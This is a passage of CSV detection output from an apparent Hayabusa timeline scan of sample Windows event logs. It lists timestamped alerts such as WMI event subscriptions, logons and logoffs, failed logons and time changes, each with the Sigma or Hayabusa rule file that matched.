+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:46:57.850 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:48:29.225 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:48:29.850 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x27f43  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x27f73  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:58:14.879 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 03:32:03.644 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 03:35:43.160 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 03:37:00.910 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 03:41:07.910 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 03:44:49.144 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 03:48:33.988 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 03:49:28.191 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 03:57:47.863 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:00:03.457 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:02:44.129 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:02:44.129 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
